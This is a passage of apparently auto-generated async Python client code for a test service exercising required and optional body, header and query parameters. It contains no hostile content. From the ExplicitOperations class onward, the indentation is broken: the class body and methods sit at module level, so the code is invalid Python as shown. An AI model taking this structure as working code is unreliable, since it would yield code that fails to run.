        if cls:
            return cls(pipeline_response, None, {})

    put_optional_header.metadata = {"url": "/reqopt/implicit/optional/header"}  # type: ignore

    @distributed_trace_async
    async def put_optional_body(self, body_parameter: Optional[str] = None, **kwargs: Any) -> None:
        """Test implicitly optional body parameter.

        :param body_parameter:
        :type body_parameter: str
        :return: None
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}))

        content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
        # Send the body as JSON only when one was supplied; otherwise no body.
        if body_parameter is not None:
            _json = body_parameter
        else:
            _json = None

        request = build_implicit_put_optional_body_request(
            content_type=content_type,
            json=_json,
        )
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)

        if cls:
            return cls(pipeline_response, None, {})

    put_optional_body.metadata = {"url": "/reqopt/implicit/optional/body"}  # type: ignore

    @distributed_trace_async
    async def put_optional_binary_body(self, body_parameter: Optional[IO] = None, **kwargs: Any) -> None:
        """Test implicitly optional body parameter.

        :param body_parameter:
        :type body_parameter: IO
        :return: None
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}))

        # Binary bodies are sent as raw content (octet-stream), not JSON.
        content_type = kwargs.pop("content_type", "application/octet-stream")  # type: Optional[str]
        _content = body_parameter

        request = build_implicit_put_optional_binary_body_request(
            content_type=content_type,
            content=_content,
        )
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)

        if cls:
            return cls(pipeline_response, None, {})

    put_optional_binary_body.metadata = {"url": "/reqopt/implicit/optional/binary-body"}  # type: ignore

    @distributed_trace_async
    async def get_required_global_path(self, **kwargs: Any) -> None:
        """Test implicitly required path parameter.

        :return: None
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}))

        # The "global" parameter comes from client configuration, not the call.
        request = build_implicit_get_required_global_path_request(
            required_global_path=self._config.required_global_path,
        )
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)

        if cls:
            return cls(pipeline_response, None, {})

    get_required_global_path.metadata = {"url": "/reqopt/global/required/path/{required-global-path}"}  # type: ignore

    @distributed_trace_async
    async def get_required_global_query(self, **kwargs: Any) -> None:
        """Test implicitly required query parameter.

        :return: None
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}))

        # The "global" parameter comes from client configuration, not the call.
        request = build_implicit_get_required_global_query_request(
            required_global_query=self._config.required_global_query,
        )
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)

        if cls:
            return cls(pipeline_response, None, {})

    get_required_global_query.metadata = {"url": "/reqopt/global/required/query"}  # type: ignore

    @distributed_trace_async
    async def get_optional_global_query(self, **kwargs: Any) -> None:
        """Test implicitly optional query parameter.

        :return: None
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop("cls", None)  # type: ClsType[None]
        error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop("error_map", {}))

        # The "global" parameter comes from client configuration, not the call.
        request = build_implicit_get_optional_global_query_request(
            optional_global_query=self._config.optional_global_query,
        )
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response)

        if cls:
            return cls(pipeline_response, None, {})

    get_optional_global_query.metadata = {"url": "/reqopt/global/optional/query"}  # type: ignore
class ExplicitOperations:
"""ExplicitOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def put_optional_binary_body(self, body_parameter: Optional[IO] = None, **kwargs: Any) -> None:
    """Test explicitly optional body parameter.

    :param body_parameter:
    :type body_parameter: IO
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Status -> exception mapping; callers may override via 'error_map' kwarg.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    # Binary bodies are sent as raw content (octet-stream), not JSON.
    content_type = kwargs.pop("content_type", "application/octet-stream")  # type: Optional[str]
    _content = body_parameter

    request = build_explicit_put_optional_binary_body_request(
        content_type=content_type,
        content=_content,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

put_optional_binary_body.metadata = {"url": "/reqopt/explicit/optional/binary-body"}  # type: ignore
@distributed_trace_async
async def put_required_binary_body(self, body_parameter: IO, **kwargs: Any) -> None:
    """Test explicitly required body parameter.

    :param body_parameter:
    :type body_parameter: IO
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    # Required binary body: streamed as raw octet-stream content.
    content_type = kwargs.pop("content_type", "application/octet-stream")  # type: Optional[str]
    _content = body_parameter

    request = build_explicit_put_required_binary_body_request(
        content_type=content_type,
        content=_content,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

put_required_binary_body.metadata = {"url": "/reqopt/explicit/required/binary-body"}  # type: ignore
@distributed_trace_async
async def post_required_integer_parameter(self, body_parameter: int, **kwargs: Any) -> None:
    """Test explicitly required integer. Please put null and the client library should throw before
    the request is sent.

    :param body_parameter:
    :type body_parameter: int
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    _json = body_parameter

    request = build_explicit_post_required_integer_parameter_request(
        content_type=content_type,
        json=_json,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

# NOTE(review): 'requied' is the spelling the route was generated with — do
# not "fix" it here; it must match the service definition.
post_required_integer_parameter.metadata = {"url": "/reqopt/requied/integer/parameter"}  # type: ignore
@distributed_trace_async
async def post_optional_integer_parameter(self, body_parameter: Optional[int] = None, **kwargs: Any) -> None:
    """Test explicitly optional integer. Please put null.

    :param body_parameter:
    :type body_parameter: int
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # Optional body: only serialized when a value was supplied.
    if body_parameter is not None:
        _json = body_parameter
    else:
        _json = None

    request = build_explicit_post_optional_integer_parameter_request(
        content_type=content_type,
        json=_json,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

post_optional_integer_parameter.metadata = {"url": "/reqopt/optional/integer/parameter"}  # type: ignore
@distributed_trace_async
async def post_required_integer_property(self, body_parameter: JSONType, **kwargs: Any) -> None:
    """Test explicitly required integer. Please put a valid int-wrapper with 'value' = null and the
    client library should throw before the request is sent.

    :param body_parameter:
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            body_parameter = {
                "value": 0  # Required.
            }
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # Body is an already-JSON-shaped dict; passed through as-is.
    _json = body_parameter

    request = build_explicit_post_required_integer_property_request(
        content_type=content_type,
        json=_json,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

post_required_integer_property.metadata = {"url": "/reqopt/requied/integer/property"}  # type: ignore
@distributed_trace_async
async def post_optional_integer_property(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
    """Test explicitly optional integer. Please put a valid int-wrapper with 'value' = null.

    :param body_parameter:
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            body_parameter = {
                "value": 0  # Optional.
            }
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # Optional body: only serialized when a value was supplied.
    if body_parameter is not None:
        _json = body_parameter
    else:
        _json = None

    request = build_explicit_post_optional_integer_property_request(
        content_type=content_type,
        json=_json,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

post_optional_integer_property.metadata = {"url": "/reqopt/optional/integer/property"}  # type: ignore
@distributed_trace_async
async def post_required_integer_header(self, *, header_parameter: int, **kwargs: Any) -> None:
    """Test explicitly required integer. Please put a header 'headerParameter' => null and the client
    library should throw before the request is sent.

    :keyword header_parameter:
    :paramtype header_parameter: int
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    # Header-only operation: no request body, no content_type handling.
    request = build_explicit_post_required_integer_header_request(
        header_parameter=header_parameter,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

post_required_integer_header.metadata = {"url": "/reqopt/requied/integer/header"}  # type: ignore
@distributed_trace_async
async def post_optional_integer_header(self, *, header_parameter: Optional[int] = None, **kwargs: Any) -> None:
    """Test explicitly optional integer. Please put a header 'headerParameter' => null.

    :keyword header_parameter:
    :paramtype header_parameter: int
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    # Header-only operation: no request body, no content_type handling.
    request = build_explicit_post_optional_integer_header_request(
        header_parameter=header_parameter,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

post_optional_integer_header.metadata = {"url": "/reqopt/optional/integer/header"}  # type: ignore
@distributed_trace_async
async def post_required_string_parameter(self, body_parameter: str, **kwargs: Any) -> None:
    """Test explicitly required string. Please put null and the client library should throw before the
    request is sent.

    :param body_parameter:
    :type body_parameter: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    _json = body_parameter

    request = build_explicit_post_required_string_parameter_request(
        content_type=content_type,
        json=_json,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

post_required_string_parameter.metadata = {"url": "/reqopt/requied/string/parameter"}  # type: ignore
@distributed_trace_async
async def post_optional_string_parameter(self, body_parameter: Optional[str] = None, **kwargs: Any) -> None:
    """Test explicitly optional string. Please put null.

    :param body_parameter:
    :type body_parameter: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))

    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # Optional body: only serialized when a value was supplied.
    if body_parameter is not None:
        _json = body_parameter
    else:
        _json = None

    request = build_explicit_post_optional_string_parameter_request(
        content_type=content_type,
        json=_json,
    )
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)

    if cls:
        return cls(pipeline_response, None, {})

post_optional_string_parameter.metadata = {"url": "/reqopt/optional/string/parameter"}  # type: ignore
@distributed_trace_async
async def post_required_string_property(self, body_parameter: JSONType, **kwargs: Any) -> None:
    """Test explicitly required string. Please put a valid string-wrapper with 'value' = null and the
    client library should throw before the request is sent.

    :param body_parameter: A mapping shaped like ``{"value": "str"}`` (``value`` required).
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    http_request = build_explicit_post_required_string_property_request(
        content_type=content_type,
        json=body_parameter,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_required_string_property.metadata = {"url": "/reqopt/requied/string/property"}  # type: ignore
@distributed_trace_async
async def post_optional_string_property(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
    """Test explicitly optional integer. Please put a valid string-wrapper with 'value' = null.

    :param body_parameter: A mapping shaped like ``{"value": "str"}`` (``value`` optional).
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # A missing body serializes as a JSON null payload.
    _json = body_parameter if body_parameter is not None else None
    http_request = build_explicit_post_optional_string_property_request(
        content_type=content_type,
        json=_json,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_optional_string_property.metadata = {"url": "/reqopt/optional/string/property"}  # type: ignore
@distributed_trace_async
async def post_required_string_header(self, *, header_parameter: str, **kwargs: Any) -> None:
    """Test explicitly required string. Please put a header 'headerParameter' => null and the client
    library should throw before the request is sent.

    :keyword header_parameter:
    :paramtype header_parameter: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    http_request = build_explicit_post_required_string_header_request(
        header_parameter=header_parameter,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_required_string_header.metadata = {"url": "/reqopt/requied/string/header"}  # type: ignore
@distributed_trace_async
async def post_optional_string_header(self, *, body_parameter: Optional[str] = None, **kwargs: Any) -> None:
    """Test explicitly optional string. Please put a header 'headerParameter' => null.

    :keyword body_parameter:
    :paramtype body_parameter: str
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    http_request = build_explicit_post_optional_string_header_request(
        body_parameter=body_parameter,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_optional_string_header.metadata = {"url": "/reqopt/optional/string/header"}  # type: ignore
@distributed_trace_async
async def post_required_class_parameter(self, body_parameter: JSONType, **kwargs: Any) -> None:
    """Test explicitly required complex object. Please put null and the client library should throw
    before the request is sent.

    :param body_parameter: A mapping shaped like ``{"id": 0, "name": "str"}``
     (``id`` required, ``name`` optional).
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    http_request = build_explicit_post_required_class_parameter_request(
        content_type=content_type,
        json=body_parameter,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_required_class_parameter.metadata = {"url": "/reqopt/requied/class/parameter"}  # type: ignore
@distributed_trace_async
async def post_optional_class_parameter(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
    """Test explicitly optional complex object. Please put null.

    :param body_parameter: A mapping shaped like ``{"id": 0, "name": "str"}``
     (``id`` required, ``name`` optional).
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # A missing body serializes as a JSON null payload.
    _json = body_parameter if body_parameter is not None else None
    http_request = build_explicit_post_optional_class_parameter_request(
        content_type=content_type,
        json=_json,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_optional_class_parameter.metadata = {"url": "/reqopt/optional/class/parameter"}  # type: ignore
@distributed_trace_async
async def post_required_class_property(self, body_parameter: JSONType, **kwargs: Any) -> None:
    """Test explicitly required complex object. Please put a valid class-wrapper with 'value' = null
    and the client library should throw before the request is sent.

    :param body_parameter:
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            body_parameter = {
                "value": {
                    "id": 0,  # Required.
                    "name": "str"  # Optional.
                }
            }
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses mapped to dedicated azure-core exceptions; callers may override
    # individual entries via the ``error_map`` keyword argument.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # The body is forwarded verbatim as the JSON payload.
    _json = body_parameter
    request = build_explicit_post_required_class_property_request(
        content_type=content_type,
        json=_json,
    )
    # Resolve the relative path against the client's configured base URL.
    request.url = self._client.format_url(request.url)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)
    if cls:
        return cls(pipeline_response, None, {})

post_required_class_property.metadata = {"url": "/reqopt/requied/class/property"}  # type: ignore
@distributed_trace_async
async def post_optional_class_property(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
    """Test explicitly optional complex object. Please put a valid class-wrapper with 'value' = null.

    :param body_parameter: A mapping shaped like ``{"value": {"id": 0, "name": "str"}}``.
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # A missing body serializes as a JSON null payload.
    _json = body_parameter if body_parameter is not None else None
    http_request = build_explicit_post_optional_class_property_request(
        content_type=content_type,
        json=_json,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_optional_class_property.metadata = {"url": "/reqopt/optional/class/property"}  # type: ignore
@distributed_trace_async
async def post_required_array_parameter(self, body_parameter: List[str], **kwargs: Any) -> None:
    """Test explicitly required array. Please put null and the client library should throw before the
    request is sent.

    :param body_parameter:
    :type body_parameter: list[str]
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    http_request = build_explicit_post_required_array_parameter_request(
        content_type=content_type,
        json=body_parameter,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_required_array_parameter.metadata = {"url": "/reqopt/requied/array/parameter"}  # type: ignore
@distributed_trace_async
async def post_optional_array_parameter(self, body_parameter: Optional[List[str]] = None, **kwargs: Any) -> None:
    """Test explicitly optional array. Please put null.

    :param body_parameter:
    :type body_parameter: list[str]
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # A missing body serializes as a JSON null payload.
    _json = body_parameter if body_parameter is not None else None
    http_request = build_explicit_post_optional_array_parameter_request(
        content_type=content_type,
        json=_json,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_optional_array_parameter.metadata = {"url": "/reqopt/optional/array/parameter"}  # type: ignore
@distributed_trace_async
async def post_required_array_property(self, body_parameter: JSONType, **kwargs: Any) -> None:
    """Test explicitly required array. Please put a valid array-wrapper with 'value' = null and the
    client library should throw before the request is sent.

    :param body_parameter: A mapping shaped like ``{"value": ["str"]}`` (``value`` required).
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    http_request = build_explicit_post_required_array_property_request(
        content_type=content_type,
        json=body_parameter,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_required_array_property.metadata = {"url": "/reqopt/requied/array/property"}  # type: ignore
@distributed_trace_async
async def post_optional_array_property(self, body_parameter: JSONType = None, **kwargs: Any) -> None:
    """Test explicitly optional array. Please put a valid array-wrapper with 'value' = null.

